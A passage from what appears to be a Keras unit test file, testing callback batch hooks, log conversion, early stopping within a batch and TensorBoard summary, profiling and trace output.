  @test_combinations.run_all_keras_modes(always_skip_v1=True)
  def test_callback_passed_floats(self):

    class MyCallback(keras.callbacks.Callback):

      def on_batch_end(self, batch, logs=None):
        assert isinstance(batch, int)
        assert isinstance(logs['loss'], float)
        self.on_batch_end_called = True

      def on_epoch_end(self, batch, logs=None):
        assert isinstance(batch, int)
        assert isinstance(logs['loss'], float)
        self.on_epoch_end_called = True

    x, y = np.ones((10, 1)), np.ones((10, 1))
    model = keras.Sequential([keras.layers.Dense(1)])
    model.compile('sgd', 'mse', run_eagerly=test_utils.should_run_eagerly())

    callback = MyCallback()
    model.fit(x, y, epochs=2, callbacks=[callback])
    self.assertTrue(callback.on_batch_end_called)
    self.assertTrue(callback.on_epoch_end_called)

  @test_combinations.run_all_keras_modes(always_skip_v1=True)
  def test_implements_batch_hooks(self):

    class MyCallbackWithBatchHooks(keras.callbacks.Callback):

      def __init__(self):
        self.train_batches = 0
        self.test_batches = 0
        self.predict_batches = 0

      def on_train_batch_end(self, batch, logs=None):
        self.train_batches += 1

      def on_test_batch_end(self, batch, logs=None):
        self.test_batches += 1

      def on_predict_batch_end(self, batch, logs=None):
        self.predict_batches += 1

    class MyCallbackWithTFBatchHooks(keras.callbacks.Callback):

      def __init__(self):
        super(MyCallbackWithTFBatchHooks, self).__init__()
        self._supports_tf_logs = True

    class MyCallbackWithoutBatchHooks(keras.callbacks.Callback):

      def __init__(self):
        self.epochs = 0

      def on_epoch_end(self, epoch, logs=None):
        self.epochs += 1

    x, y = np.ones((10, 1)), np.ones((10, 1))
    model = keras.Sequential([keras.layers.Dense(1)])
    model.compile('sgd', 'mse')

    my_cb = MyCallbackWithBatchHooks()
    cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
    self.assertTrue(cb_list._should_call_train_batch_hooks)
    self.assertTrue(cb_list._should_call_test_batch_hooks)
    self.assertTrue(cb_list._should_call_predict_batch_hooks)
    self.assertFalse(cb_list._batch_hooks_support_tf_logs)

    model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
    model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
    model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)

    self.assertEqual(my_cb.train_batches, 2)
    self.assertEqual(my_cb.test_batches, 1)
    self.assertEqual(my_cb.predict_batches, 1)

    my_cb = MyCallbackWithTFBatchHooks()
    cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
    self.assertTrue(cb_list._batch_hooks_support_tf_logs)

    my_cb = MyCallbackWithoutBatchHooks()
    cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
    self.assertLen(cb_list.callbacks, 1)
    self.assertFalse(cb_list._should_call_train_batch_hooks)
    self.assertFalse(cb_list._should_call_test_batch_hooks)
    self.assertFalse(cb_list._should_call_predict_batch_hooks)

    model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
    model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
    model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)

  @test_combinations.run_all_keras_modes(always_skip_v1=True)
  def test_logs_conversion(self):
    assert_dict_equal = self.assertDictEqual

    class MutateNumpyLogs(CallAllHooks):

      def _run(self, *args, logs=None):
        logs = logs or args[-1]
        logs['numpy'] = 1

    class MutateTensorFlowLogs(CallAllHooks):

      def __init__(self):
        super(MutateTensorFlowLogs, self).__init__()
self._supports_tf_logs = True def _run(self, *args, logs=None): logs = logs or args[-1] logs['tf'] = 2 class AssertNumpyLogs(CallAllHooks): def _run(self, *args, logs=None): logs = logs or args[-1] assert_dict_equal(logs, {'all': 0, 'numpy': 1, 'tf': 2}) class AssertTensorFlowLogs(AssertNumpyLogs): def __init__(self): super(AssertTensorFlowLogs, self).__init__() self._supports_tf_logs = True cb_list = keras.callbacks.CallbackList([ MutateNumpyLogs(), MutateTensorFlowLogs(), AssertNumpyLogs(), AssertTensorFlowLogs() ]) assert len(cb_list.callbacks) == 4 cb_list.on_epoch_begin(0, logs={'all': 0}) cb_list.on_epoch_end(0, logs={'all': 0}) cb_list.on_predict_batch_begin(0, logs={'all': 0}) cb_list.on_predict_batch_end(0, logs={'all': 0}) cb_list.on_predict_begin(logs={'all': 0}) cb_list.on_predict_end(logs={'all': 0}) cb_list.on_test_batch_begin(0, logs={'all': 0}) cb_list.on_test_batch_end(0, logs={'all': 0}) cb_list.on_test_begin(logs={'all': 0}) cb_list.on_test_end(logs={'all': 0}) cb_list.on_train_batch_begin(0, logs={'all': 0}) cb_list.on_train_batch_end(0, logs={'all': 0}) cb_list.on_train_begin(logs={'all': 0}) cb_list.on_train_end(logs={'all': 0}) @test_combinations.run_all_keras_modes(always_skip_v1=True) def test_implements_batch_hooks_override(self): class MyCallback(keras.callbacks.Callback): def __init__(self, should_run=True): self.should_run = should_run self.train_batches = 0 self.test_batches = 0 self.predict_batches = 0 def on_train_batch_end(self, batch, logs=None): self.train_batches += 1 def on_test_batch_end(self, batch, logs=None): self.test_batches += 1 def on_predict_batch_end(self, batch, logs=None): self.predict_batches += 1 def _implements_train_batch_hooks(self): return self.should_run def _implements_test_batch_hooks(self): return self.should_run def _implements_predict_batch_hooks(self): return self.should_run x, y = np.ones((10, 1)), np.ones((10, 1)) model = keras.Sequential([keras.layers.Dense(1)]) model.compile('sgd', 'mse') my_cb = MyCallback(should_run=True) cb_list = keras.callbacks.CallbackList([my_cb], verbose=0) self.assertTrue(cb_list._should_call_train_batch_hooks) self.assertTrue(cb_list._should_call_test_batch_hooks) self.assertTrue(cb_list._should_call_predict_batch_hooks) model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0) model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0) model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0) self.assertEqual(my_cb.train_batches, 2) self.assertEqual(my_cb.test_batches, 1) self.assertEqual(my_cb.predict_batches, 1) my_cb = MyCallback(should_run=False) cb_list = keras.callbacks.CallbackList([my_cb], verbose=0) self.assertFalse(cb_list._should_call_train_batch_hooks) self.assertFalse(cb_list._should_call_test_batch_hooks) self.assertFalse(cb_list._should_call_predict_batch_hooks) model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0) model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0) model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0) self.assertEqual(my_cb.train_batches, 0) self.assertEqual(my_cb.test_batches, 0) self.assertEqual(my_cb.predict_batches, 0) @test_combinations.run_all_keras_modes(always_skip_v1=True) def test_default_callbacks_do_not_call_batch_hooks(self): model = keras.Sequential([keras.layers.Dense(1)]) log_dir = self.get_temp_dir() cb_list = keras.callbacks.CallbackList([ keras.callbacks.TensorBoard(log_dir, profile_batch=0), keras.callbacks.ModelCheckpoint(log_dir), ], add_progbar=True, model=model, verbose=2, 
epochs=3) self.assertLen(cb_list.callbacks, 3) self.assertFalse(cb_list._should_call_train_batch_hooks) self.assertFalse(cb_list._should_call_test_batch_hooks) self.assertFalse(cb_list._should_call_predict_batch_hooks) @test_combinations.run_all_keras_modes(always_skip_v1=True) def test_change_tf_functions_during_fit(self): class ChangeFunctions(keras.callbacks.Callback): def on_epoch_end(self, epochs, logs=None): def new_fn(iterator): raise ValueError('New function substituted successfully.') self.model.train_function = new_fn self.model.test_function = new_fn self.model.predict_function = new_fn model = keras.Sequential([keras.layers.Dense(1)]) model.compile('sgd', 'mse') x, y = np.ones((10, 10)), np.ones((10, 1)) with self.assertRaisesRegexp(ValueError, 'New function '): model.fit(x, y, batch_size=2, epochs=2, callbacks=[ChangeFunctions()]) with self.assertRaisesRegexp(ValueError, 'New function '): model.evaluate(x, y, batch_size=2) with self.assertRaisesRegexp(ValueError, 'New function '): model.predict(x, batch_size=2) @test_combinations.run_all_keras_modes(always_skip_v1=True) def test_stop_training_batch_level(self): class MyCallback(keras.callbacks.Callback): def __init__(self): super(MyCallback, self).__init__() self.batch_counter = 0 def on_train_batch_end(self, batch, logs=None): self.batch_counter += 1 if batch == 2: self.model.stop_training = True model = keras.Sequential([keras.layers.Dense(1)]) model.compile('sgd', 'mse') x, y = np.ones((10, 10)), np.ones((10, 1)) my_cb = MyCallback() # Will run 5 batches if `stop_training` doesn't work. model.fit(x, y, batch_size=2, callbacks=[my_cb]) self.assertEqual(my_cb.batch_counter, 3) @test_combinations.run_all_keras_modes(always_skip_v1=True) def test_built_in_callback_order(self): class CustomCallback(keras.callbacks.Callback): pass class TestingCallbackList(keras.callbacks.CallbackList): def __init__(self, *args, **kwargs): super(TestingCallbackList, self).__init__(*args, **kwargs) if ((not isinstance(self.callbacks[0], CustomCallback)) or (not isinstance(self.callbacks[1], keras.callbacks.History)) or (not isinstance(self.callbacks[2], keras.callbacks.ProgbarLogger))): raise AssertionError(f'Callback order unexpected: {self.callbacks}') with mock.patch.object( keras.callbacks, 'CallbackList', TestingCallbackList): model = keras.Sequential([keras.layers.Dense(1)]) model.compile('sgd', 'mse') custom_callback = CustomCallback() model.fit(np.ones((10, 10)), np.ones((10, 1)), epochs=5, callbacks=[custom_callback]) # A summary that was emitted during a test. Fields: # logdir: str. The logdir of the FileWriter to which the summary was # written. # tag: str. The name of the summary. _ObservedSummary = collections.namedtuple('_ObservedSummary', ('logdir', 'tag')) class _SummaryFile: """A record of summary tags and the files to which they were written. Fields `scalars`, `images`, `histograms`, and `tensors` are sets containing `_ObservedSummary` values. """ def __init__(self): self.scalars = set() self.images = set() self.histograms = set() self.tensors = set() self.graph_defs = [] self.convert_from_v2_summary_proto = False def list_summaries(logdir): """Read all summaries under the logdir into a `_SummaryFile`. Args: logdir: A path to a directory that contains zero or more event files, either as direct children or in transitive subdirectories. Summaries in these events must only contain old-style scalars, images, and histograms. Non-summary events, like `graph_def`s, are ignored. 
Returns: A `_SummaryFile` object reflecting all summaries written to any event files in the logdir or any of its descendant directories. Raises: ValueError: If an event file contains an summary of unexpected kind. """ result = _SummaryFile() for (dirpath, _, filenames) in os.walk(logdir): for filename in filenames: if not filename.startswith('events.out.'): continue path = os.path.join(dirpath, filename) for event in tf.compat.v1.train.summary_iterator(path): if event.graph_def: result.graph_defs.append(event.graph_def) if not event.summary: # (e.g., it's a `graph_def` event) continue for value in event.summary.value: tag = value.tag # Case on the `value` rather than the summary metadata because # the Keras callback uses `summary_ops_v2` to emit old-style # summaries. See b/124535134. kind = value.WhichOneof('value') container = { 'simple_value': result.scalars, 'image': result.images, 'histo': result.histograms, 'tensor': result.tensors, }.get(kind) if container is None: raise ValueError( 'Unexpected summary kind %r in event file %s:\n%r' % (kind, path, event)) elif kind == 'tensor' and tag != 'keras': # Convert the tf2 summary proto to old style for type checking. plugin_name = value.metadata.plugin_data.plugin_name container = { 'images': result.images, 'histograms': result.histograms, 'scalars': result.scalars, }.get(plugin_name) if container is not None: result.convert_from_v2_summary_proto = True else: container = result.tensors container.add(_ObservedSummary(logdir=dirpath, tag=tag)) return result @test_combinations.run_with_all_model_types @test_combinations.run_all_keras_modes(always_skip_v1=True) class TestTensorBoardV2(test_combinations.TestCase): def setUp(self): super(TestTensorBoardV2, self).setUp() self.logdir = os.path.join(self.get_temp_dir(), 'tb') self.train_dir = os.path.join(self.logdir, 'train') self.validation_dir = os.path.join(self.logdir, 'validation') def _get_model(self, compile_model=True): layers = [ keras.layers.Conv2D(8, (3, 3)), keras.layers.Flatten(), keras.layers.Dense(1) ] model = test_utils.get_model_from_layers(layers, input_shape=(10, 10, 1)) if compile_model: opt = gradient_descent.SGD(learning_rate=0.001) model.compile(opt, 'mse', run_eagerly=test_utils.should_run_eagerly()) return model def test_TensorBoard_default_logdir(self): """Regression test for cross-platform pathsep in default logdir.""" os.chdir(self.get_temp_dir()) model = self._get_model() x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1)) tb_cbk = keras.callbacks.TensorBoard() # no logdir specified model.fit( x, y, batch_size=2, epochs=2, validation_data=(x, y), callbacks=[tb_cbk]) summary_file = list_summaries(logdir='.') train_dir = os.path.join('.', 'logs', 'train') validation_dir = os.path.join('.', 'logs', 'validation') self.assertEqual( summary_file.scalars, { _ObservedSummary(logdir=train_dir, tag='epoch_loss'), _ObservedSummary(logdir=validation_dir, tag='epoch_loss'), _ObservedSummary( logdir=validation_dir, tag='evaluation_loss_vs_iterations'), }) def test_TensorBoard_basic(self): model = self._get_model() x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1)) tb_cbk = keras.callbacks.TensorBoard(self.logdir) model.fit( x, y, batch_size=2, epochs=2, validation_data=(x, y), callbacks=[tb_cbk]) summary_file = list_summaries(self.logdir) self.assertEqual( summary_file.scalars, { _ObservedSummary(logdir=self.train_dir, tag='epoch_loss'), _ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'), _ObservedSummary( logdir=self.validation_dir, tag='evaluation_loss_vs_iterations'), }) 
def test_TensorBoard_across_invocations(self): """Regression test for summary writer resource use-after-free. See: <https://github.com/tensorflow/tensorflow/issues/25707> """ model = self._get_model() x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1)) tb_cbk = keras.callbacks.TensorBoard(self.logdir) for _ in (1, 2): model.fit( x, y, batch_size=2, epochs=2, validation_data=(x, y), callbacks=[tb_cbk]) summary_file = list_summaries(self.logdir) self.assertEqual( summary_file.scalars, { _ObservedSummary(logdir=self.train_dir, tag='epoch_loss'), _ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'), _ObservedSummary( logdir=self.validation_dir, tag='evaluation_loss_vs_iterations'), }) def test_TensorBoard_no_spurious_event_files(self): model = self._get_model() x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1)) tb_cbk = keras.callbacks.TensorBoard(self.logdir) model.fit( x, y, batch_size=2, epochs=2, callbacks=[tb_cbk]) events_file_run_basenames = set() for (dirpath, _, filenames) in os.walk(self.train_dir): if any(fn.startswith('events.out.') for fn in filenames): events_file_run_basenames.add(os.path.basename(dirpath)) self.assertEqual(events_file_run_basenames, {'train'}) def test_TensorBoard_batch_metrics(self): model = self._get_model() x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1)) tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1) model.fit( x, y, batch_size=2, epochs=2, validation_data=(x, y), callbacks=[tb_cbk]) summary_file = list_summaries(self.logdir) self.assertEqual( summary_file.scalars, { _ObservedSummary(logdir=self.train_dir, tag='epoch_loss'), _ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'), _ObservedSummary( logdir=self.validation_dir, tag='evaluation_loss_vs_iterations'), }, ) def test_TensorBoard_learning_rate_schedules(self): model = self._get_model(compile_model=False) opt = gradient_descent.SGD(learning_rate_schedule.CosineDecay(0.01, 1)) model.compile(opt, 'mse', run_eagerly=test_utils.should_run_eagerly()) x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1)) model.fit( x, y, batch_size=2, epochs=2, callbacks=[keras.callbacks.TensorBoard(self.logdir)]) summary_file = list_summaries(self.logdir) self.assertEqual( summary_file.scalars, { _ObservedSummary(logdir=self.train_dir, tag='epoch_loss'), _ObservedSummary(logdir=self.train_dir, tag='epoch_learning_rate'), }, ) def test_TensorBoard_global_step(self): model = self._get_model(compile_model=False) opt = gradient_descent.SGD(learning_rate_schedule.CosineDecay(0.01, 1)) model.compile(opt, 'mse', run_eagerly=test_utils.should_run_eagerly()) x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1)) model.fit( x, y, batch_size=2, epochs=2, verbose=0, callbacks=[ keras.callbacks.TensorBoard( self.logdir, update_freq=1, profile_batch=0, write_steps_per_second=True) ]) summary_file = list_summaries(self.logdir) self.assertEqual( summary_file.scalars, { _ObservedSummary(logdir=self.train_dir, tag='epoch_loss'), _ObservedSummary(logdir=self.train_dir, tag='epoch_learning_rate'), _ObservedSummary( logdir=self.train_dir, tag='epoch_steps_per_second'), _ObservedSummary( logdir=self.train_dir, tag='batch_steps_per_second'), }, ) def test_TensorBoard_weight_histograms(self): model = self._get_model() x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1)) tb_cbk = keras.callbacks.TensorBoard(self.logdir, histogram_freq=1) model_type = test_utils.get_model_type() model.fit( x, y, batch_size=2, epochs=2, validation_data=(x, y), callbacks=[tb_cbk]) summary_file = list_summaries(self.logdir) self.assertEqual( 
summary_file.scalars, { _ObservedSummary(logdir=self.train_dir, tag='epoch_loss'), _ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'), _ObservedSummary( logdir=self.validation_dir, tag='evaluation_loss_vs_iterations'), }, ) self.assertEqual( self._strip_layer_names(summary_file.histograms, model_type), { _ObservedSummary(logdir=self.train_dir, tag='bias_0'), _ObservedSummary(logdir=self.train_dir, tag='kernel_0'), }, ) def test_TensorBoard_weight_images(self): model = self._get_model() x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1)) tb_cbk = keras.callbacks.TensorBoard( self.logdir, histogram_freq=1, write_images=True) model_type = test_utils.get_model_type() model.fit( x, y, batch_size=2, epochs=2, validation_data=(x, y), callbacks=[tb_cbk]) summary_file = list_summaries(self.logdir) self.assertEqual( summary_file.scalars, { _ObservedSummary(logdir=self.train_dir, tag='epoch_loss'), _ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'), _ObservedSummary( logdir=self.validation_dir, tag='evaluation_loss_vs_iterations'), }, ) self.assertEqual( self._strip_layer_names(summary_file.histograms, model_type), { _ObservedSummary(logdir=self.train_dir, tag='bias_0'), _ObservedSummary(logdir=self.train_dir, tag='kernel_0'), }, ) if summary_file.convert_from_v2_summary_proto: expected = { _ObservedSummary(logdir=self.train_dir, tag='bias_0'), _ObservedSummary(logdir=self.train_dir, tag='kernel_0'), } else: expected = { _ObservedSummary(logdir=self.train_dir, tag='bias_0/image/0'), _ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/0'), _ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/1'), _ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/2'), } self.assertEqual( self._strip_layer_names(summary_file.images, model_type), expected ) def test_TensorBoard_projector_callback(self): layers = [ keras.layers.Embedding(10, 10, name='test_embedding'), keras.layers.Dense(10, activation='relu'), keras.layers.Dense(1, activation='sigmoid') ] model = test_utils.get_model_from_layers(layers, input_shape=(10,)) model.compile( optimizer='adam', loss=keras.losses.BinaryCrossentropy(from_logits=True), run_eagerly=test_utils.should_run_eagerly()) x, y = np.ones((10, 10)), np.ones((10, 10)) tb_cbk = keras.callbacks.TensorBoard( self.logdir, embeddings_freq=1, embeddings_metadata={'test_embedding': 'metadata.tsv'}) model.fit( x, y, batch_size=2, epochs=2, validation_data=(x, y), callbacks=[tb_cbk]) with open(os.path.join(self.logdir, 'projector_config.pbtxt')) as f: self.assertEqual(f.readlines(), [ 'embeddings {\n', (' tensor_name: ' '"layer_with_weights-0/embeddings/.ATTRIBUTES/VARIABLE_VALUE"\n'), ' metadata_path: "metadata.tsv"\n', '}\n' ]) def test_custom_summary(self): if not tf.executing_eagerly(): self.skipTest('Custom summaries only supported in V2 code path.') def scalar_v2_mock(name, data, step=None): """A reimplementation of the scalar plugin to avoid circular deps.""" metadata = tf.compat.v1.SummaryMetadata() # Should match value in tensorboard/plugins/scalar/metadata.py. 
metadata.plugin_data.plugin_name = 'scalars' with tf.summary.experimental.summary_scope( name, 'scalar_summary', values=[data, step]) as (tag, _): return tf.summary.write( tag=tag, tensor=tf.cast(data, 'float32'), step=step, metadata=metadata) class LayerWithSummary(keras.layers.Layer): def call(self, x): scalar_v2_mock('custom_summary', tf.reduce_sum(x)) return x model = test_utils.get_model_from_layers([LayerWithSummary()], input_shape=(5,), name='model') model.compile( 'sgd', 'mse', run_eagerly=test_utils.should_run_eagerly()) tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1) x, y = np.ones((10, 5)), np.ones((10, 5)) model.fit(x, y, batch_size=2, validation_data=(x, y), callbacks=[tb_cbk]) summary_file = list_summaries(self.logdir) self.assertEqual( summary_file.scalars, { _ObservedSummary(logdir=self.train_dir, tag='epoch_loss'), _ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'), _ObservedSummary( logdir=self.validation_dir, tag='evaluation_loss_vs_iterations'), _ObservedSummary( logdir=self.train_dir, tag='model/layer_with_summary/custom_summary'), _ObservedSummary( logdir=self.validation_dir, tag='model/layer_with_summary/custom_summary') }, ) def _strip_layer_names(self, summaries, model_type): """Deduplicate summary names modulo layer prefix. This removes the first slash-component of each tag name: for instance, "foo/bar/baz" becomes "bar/baz". Args: summaries: A `set` of `_ObservedSummary` values. model_type: The model type currently being tested. Returns: A new `set` of `_ObservedSummary` values with layer prefixes removed. """ result = set() for summary in summaries: if '/' not in summary.tag: raise ValueError('tag has no layer name: %r' % summary.tag) start_from = 2 if 'subclass' in model_type else 1 new_tag = '/'.join(summary.tag.split('/')[start_from:]) result.add(summary._replace(tag=new_tag)) return result def test_TensorBoard_invalid_argument(self): with self.assertRaisesRegex(ValueError, 'Unrecognized arguments'): keras.callbacks.TensorBoard(wwrite_images=True) def test_TensorBoard_non_blocking(self): model = keras.Sequential([keras.layers.Dense(1)]) tb = keras.callbacks.TensorBoard(self.logdir) self.assertTrue(tb._supports_tf_logs) cb_list = keras.callbacks.CallbackList([tb], model=model, epochs=1, steps=100, verbose=0) tensor = tf.convert_to_tensor(1.) def mock_numpy(): raise RuntimeError( 'If this error is seen, TensorBoard is causing a blocking ' 'NumPy conversion.') with tf.compat.v1.test.mock.patch.object(tensor, 'numpy', mock_numpy): logs = {'metric': tensor} cb_list.on_train_begin(logs) cb_list.on_epoch_begin(0, logs) cb_list.on_train_batch_begin(0, logs) cb_list.on_train_batch_end(0, logs) cb_list.on_epoch_end(0, logs) cb_list.on_train_end(logs) cb_list.on_test_begin(logs) cb_list.on_test_batch_begin(0, logs) cb_list.on_test_batch_end(0, logs) cb_list.on_test_end(logs) cb_list.on_predict_begin(logs) cb_list.on_predict_batch_begin(logs) cb_list.on_predict_batch_end(logs) cb_list.on_predict_end(logs) # Note that this test specifies model_type explicitly. 
@test_combinations.run_all_keras_modes(always_skip_v1=True) class TestTensorBoardV2NonParameterizedTest(test_combinations.TestCase): def setUp(self): super(TestTensorBoardV2NonParameterizedTest, self).setUp() self.logdir = os.path.join(self.get_temp_dir(), 'tb') self.train_dir = os.path.join(self.logdir, 'train') self.validation_dir = os.path.join(self.logdir, 'validation') def _get_seq_model(self): model = keras.models.Sequential([ keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)), keras.layers.Flatten(), keras.layers.Dense(1), ]) opt = gradient_descent.SGD(learning_rate=0.001) model.compile( opt, 'mse', run_eagerly=test_utils.should_run_eagerly()) return model def _count_trace_file(self, logdir): profile_dir = os.path.join(logdir, 'plugins', 'profile') count = 0 for (dirpath, dirnames, filenames) in os.walk(profile_dir): del dirpath # unused del dirnames # unused for filename in filenames: if filename.endswith('.trace.json.gz'): count += 1 return count def fitModelAndAssertKerasModelWritten(self, model): x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1)) tb_cbk = keras.callbacks.TensorBoard(self.logdir, write_graph=True, profile_batch=0) model.fit( x, y, batch_size=2, epochs=3, validation_data=(x, y), callbacks=[tb_cbk]) summary_file = list_summaries(self.logdir) self.assertEqual( summary_file.tensors, { _ObservedSummary(logdir=self.train_dir, tag='keras'), }, ) if not model.run_eagerly: # There should be one train graph self.assertLen(summary_file.graph_defs, 1) for graph_def in summary_file.graph_defs: graph_def_str = str(graph_def) # All the model layers should appear in the graphs for layer in model.layers: if 'input' not in layer.name: self.assertIn(layer.name, graph_def_str) def test_TensorBoard_writeSequentialModel_noInputShape(self): model = keras.models.Sequential([ keras.layers.Conv2D(8, (3, 3)), keras.layers.Flatten(), keras.layers.Dense(1), ]) model.compile('sgd', 'mse', run_eagerly=test_utils.should_run_eagerly()) self.fitModelAndAssertKerasModelWritten(model) def test_TensorBoard_writeSequentialModel_withInputShape(self): model = keras.models.Sequential([ keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)), keras.layers.Flatten(), keras.layers.Dense(1), ]) model.compile('sgd', 'mse', run_eagerly=test_utils.should_run_eagerly()) self.fitModelAndAssertKerasModelWritten(model) def test_TensorBoard_writeModel(self): inputs = keras.layers.Input([10, 10, 1]) x = keras.layers.Conv2D(8, (3, 3), activation='relu')(inputs) x = keras.layers.Flatten()(x) x = keras.layers.Dense(1)(x) model = keras.models.Model(inputs=inputs, outputs=[x]) model.compile('sgd', 'mse', run_eagerly=test_utils.should_run_eagerly()) self.fitModelAndAssertKerasModelWritten(model) def test_TensorBoard_autoTrace(self): model = self._get_seq_model() x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1)) tb_cbk = keras.callbacks.TensorBoard( self.logdir, histogram_freq=1, profile_batch=1, write_graph=False) model.fit( x, y, batch_size=2, epochs=2, validation_data=(x, y), callbacks=[tb_cbk]) summary_file = list_summaries(self.logdir) self.assertEqual( summary_file.tensors, { _ObservedSummary(logdir=self.train_dir, tag=u'batch_1'), }, ) self.assertEqual(1, self._count_trace_file(logdir=self.logdir)) def test_TensorBoard_autoTrace_outerProfiler(self): """Runs a profiler session that interferes with the one from the callback. The callback will not generate a profile but execution will proceed without crashing due to unhandled exceptions. 
""" tf.profiler.experimental.start(logdir='') model = self._get_seq_model() x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1)) tb_cbk = keras.callbacks.TensorBoard( self.logdir, histogram_freq=1, profile_batch=1, write_graph=False) model.fit( x, y, batch_size=2, epochs=2, validation_data=(x, y), callbacks=[tb_cbk]) summary_file = list_summaries(self.logdir) tf.profiler.experimental.stop(save=False) self.assertEqual( summary_file.tensors, { _ObservedSummary(logdir=self.train_dir, tag=u'batch_1'), }, ) self.assertEqual(0, self._count_trace_file(logdir=self.train_dir)) def test_TensorBoard_autoTrace_tagNameWithBatchNum(self): model = self._get_seq_model() x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1)) tb_cbk = keras.callbacks.TensorBoard( self.logdir, histogram_freq=1, profile_batch=2, write_graph=False) model.fit( x, y, batch_size=2, epochs=2, validation_data=(x, y), callbacks=[tb_cbk]) summary_file = list_summaries(self.logdir) self.assertEqual( summary_file.tensors, { _ObservedSummary(logdir=self.train_dir, tag=u'batch_2'), }, ) self.assertEqual(1, self._count_trace_file(logdir=self.logdir)) def test_TensorBoard_autoTrace_profileBatchRangeSingle(self): model = self._get_seq_model() x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1)) tb_cbk = keras.callbacks.TensorBoard( self.logdir, histogram_freq=1, profile_batch='2,2', write_graph=False) model.fit( x, y, batch_size=3, epochs=2, validation_data=(x, y), callbacks=[tb_cbk]) summary_file = list_summaries(self.logdir) self.assertEqual( summary_file.tensors, { # Trace will be logged once at the batch it stops profiling. _ObservedSummary(logdir=self.train_dir, tag=u'batch_2'), }, ) self.assertEqual(1, self._count_trace_file(logdir=self.logdir)) def test_TensorBoard_autoTrace_profileBatchRangeTwice(self): model = self._get_seq_model() x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1)) tb_cbk = keras.callbacks.TensorBoard( self.logdir, histogram_freq=1, profile_batch='10,10', write_graph=False) model.fit( x, y, batch_size=3, epochs=10, validation_data=(x, y), callbacks=[tb_cbk]) time.sleep(1) # Avoids the second profile over-writing the first. model.fit( x, y, batch_size=3, epochs=10, validation_data=(x, y), callbacks=[tb_cbk]) self.assertEqual(2, self._count_trace_file(logdir=self.logdir)) # Test case that replicates a Github issue. # https://github.com/tensorflow/tensorflow/issues/37543 def test_TensorBoard_autoTrace_profileTwiceGraphMode(self): tf.compat.v1.disable_eager_execution() inp = keras.Input((1,)) out = keras.layers.Dense(units=1)(inp) model = keras.Model(inp, out) model.compile(gradient_descent.SGD(1), 'mse') logdir = os.path.join(self.get_temp_dir(), 'tb1') model.fit( np.zeros((64, 1)), np.zeros((64, 1)), batch_size=32, callbacks=[keras.callbacks.TensorBoard(logdir, profile_batch=1)], ) # Verifies trace exists in the first logdir. self.assertEqual(1, self._count_trace_file(logdir=logdir)) logdir = os.path.join(self.get_temp_dir(), 'tb2') model.fit( np.zeros((64, 1)), np.zeros((64, 1)), batch_size=32, callbacks=[keras.callbacks.TensorBoard(logdir, profile_batch=2)], ) # Verifies trace exists in the second logdir. 
self.assertEqual(1, self._count_trace_file(logdir=logdir)) def test_TensorBoard_autoTrace_profileBatchRange(self): model = self._get_seq_model() x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1)) tb_cbk = keras.callbacks.TensorBoard( self.logdir, histogram_freq=1, profile_batch='1,3', write_graph=False) model.fit( x, y, batch_size=4, epochs=2, validation_data=(x, y), callbacks=[tb_cbk]) summary_file = list_summaries(self.logdir) self.assertEqual( summary_file.tensors, { # Trace will be logged once at the batch it stops profiling. _ObservedSummary(logdir=self.train_dir, tag=u'batch_3'), }, ) self.assertEqual(1, self._count_trace_file(logdir=self.logdir)) def test_TensorBoard_autoTrace_profileInvalidBatchRange(self): with self.assertRaises(ValueError): keras.callbacks.TensorBoard( self.logdir, histogram_freq=1, profile_batch='-1,3', write_graph=False) with self.assertRaises(ValueError): keras.callbacks.TensorBoard( self.logdir, histogram_freq=1, profile_batch='1,None', write_graph=False) with self.assertRaises(ValueError): keras.callbacks.TensorBoard( self.logdir, histogram_freq=1, profile_batch='6,5', write_graph=False) with self.assertRaises(ValueError): keras.callbacks.TensorBoard( self.logdir, histogram_freq=1, profile_batch=-1, write_graph=False) def test_TensorBoard_autoTrace_profile_batch_largerThanBatchCount(self): model = self._get_seq_model() x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1)) tb_cbk = keras.callbacks.TensorBoard( self.logdir, histogram_freq=1, profile_batch=10000, write_graph=False) model.fit( x, y, batch_size=2, epochs=2, validation_data=(x, y), 